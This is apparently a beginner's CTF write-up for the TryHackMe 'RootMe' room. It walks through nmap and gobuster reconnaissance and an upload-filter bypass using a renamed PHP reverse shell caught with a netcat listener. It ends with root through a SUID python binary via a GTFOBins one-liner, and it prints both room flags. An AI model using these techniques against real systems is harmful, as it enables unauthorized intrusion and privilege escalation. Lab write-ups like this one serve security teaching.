RootMe
A ctf for beginners, can you root me?
Task 1 Deploy the machine
Connect to TryHackMe network and deploy the machine. If you don’t know how to do this, complete the OpenVPN room first.
first connect open vpn. After connecting to open vpn ping the ip to check the connectivity.
Second step is to create a new directory in the Desktop
#mkdir rootme
#cd rootme
#pwd
STEP 1
Deploy the machine click start machine.
- Deploy the machine
ans: No Answer Needed
Task 2 Reconnaissance
First, let’s get information about the target.
- Scan the machine, how many ports are open?
Ans: 2
Explained qusetion 1
──(root💀kali)-[/home/blackhat]
└─# nmap -A 10.10.238.126
Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–29 19:16 IST
Nmap scan report for 10.10.238.126
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT — Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
2.What version of Apache is running?
Ans.2.4.29
3. What service is running on port 22?
Ans: ssh
4. Find directories on the web server using the GoBuster tool.
Ans: No Ans Needed
5. What is the hidden directory?
Ans: /panel/
Explained qusetion 5
using gobuster
gobuster dir -u http://ip/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
note: we get http://ip/ (by googling the ip address)
┌──(root💀kali)-[/home/blackhat]
└─# gobuster dir -u http://10.10.238.126/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
========================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
========================================
[+] Url: http://10.10.238.126/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
========================================2021/05/29 19:29:27 Starting gobuster in directory enumeration mode
========================================
/uploads (Status: 301) [Size: 316] [ → http://10.10.238.126/uploads/]
/css (Status: 301) [Size: 312] [ → http://10.10.238.126/css/]
/js (Status: 301) [Size: 311] [ → http://10.10.238.126/js/]
/panel (Status: 301) [Size: 314] [ → http://10.10.238.126/panel/] progress…………………………………………………
Task 3 Getting a shell
Find a form to upload and get a reverse shell, and find the flag.
- /panel (Status: 301) [Size: 314] [ → http://10.10.238.126/panel/]
for doing this section follow the steps
steps
- open http://ip/panel/ in browser and leave it as such.. Then move to the next step.
- Then get the pentestmonkey reverse shell in GitHub and get the php codes, copy that and paste in the text editor and then save the file in php format. NOTE: TRY TO SAVE THIS FILE IN THE DESKTOP
- Then upload the file in the site opened in the browser. There the files will could not be uploaded in the php format. so we rename the extension to (php5, jpg, or png). I used the php5
- Then again upload the file with above extension.
- Then open http://ip/uploads/. check the file. Don't open the file else you may face an error.
- Then go to the terminal and run the commands as given below
┌──(root💀kali)-[/home/blackhat]
└─# nc -lvnp 4444 - Now go to the browser and open the file you uploaded and you will get result like this
┌──(root💀kali)-[/home/blackhat]
└─# nc -lvnp 4444 1 ⨯
listening on [any] 4444 …
connect to [10.9.4.31] from (UNKNOWN) [10.10.76.20] 56326
Linux rootme 4.15.0–112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:10:51 up 51 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$
8. Now its time to get the flag…
Question
Find a form to upload and get a reverse shell, and find the flag.
Q. user.txt
(hint: Search for “file upload bypass” and “PHP reverse shell”.)
Ans: THM{y0u_g0t_a_sh3ll}
Explained
──(root💀kali)-[/home/blackhat]
└─# nc -lvnp 4444 1 ⨯
listening on [any] 4444 …
connect to [10.9.4.31] from (UNKNOWN) [10.10.76.20] 56326
Linux rootme 4.15.0–112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:10:51 up 51 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls
bin
boot
cdrom
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
vmlinuz
vmlinuz.old
$ cd root
/bin/sh: 4: cd: can’t cd to root
$$ find / -name user.txt
find: ‘/home/rootme/.cache’: Permission denied
find: ‘/home/rootme/.gnupg’: Permission denied
/var/www/user.txt
find: ‘/var/spool/rsyslog’: Permission denied
find: ‘/var/spool/cron/atjobs’: Permission denied
find: ‘/var/spool/cron/crontabs’: Permission denied
find: ‘/snap/core/9665/var/lib/waagent’: Permission denied
find: ‘/snap/core/9665/var/spool/cron/crontabs’: Permission denied
find: ‘/snap/core/9665/var/spool/rsyslog’: Permission denied
$ cat /var/www/user.txt
THM{y0u_g0t_a_sh3ll}
Task 4 Privilege escalation
Now that we have a shell, let’s escalate our privileges to root.
- Search for files with SUID permission, which file is weird?
(Hint: find / -user root -perm /4000)
Ans: /usr/bin/python
Explained
$ find / -user root -perm /4000
find: ‘/etc/polkit-1/localauthority’: Permission denied
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
find: ‘/proc/tty/driver’: Permission denied
find: ‘/proc/1/task/1/fd’: Permission deniedor you can also use this command
$ find / -user root -perm /4000 2>/dev/null
2. Find a form to escalate your privileges
(Hint: Search for gtfobins)
STEPS
- Open browser and search or use the link https://gtfobins.github.io/gtfobins/python/
- Then use the links in SUID
SUID
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
sudo install -m =xs $(which python) .
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
3. Now go to terminal
$ /usr/bin/./python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’
ls (you have to type this command)
bin
boot
cdrom
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
vmlinuz
vmlinuz.old
4. now use the commands to get the flag.
whoami
root
cd root
ls
root.txt
cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}
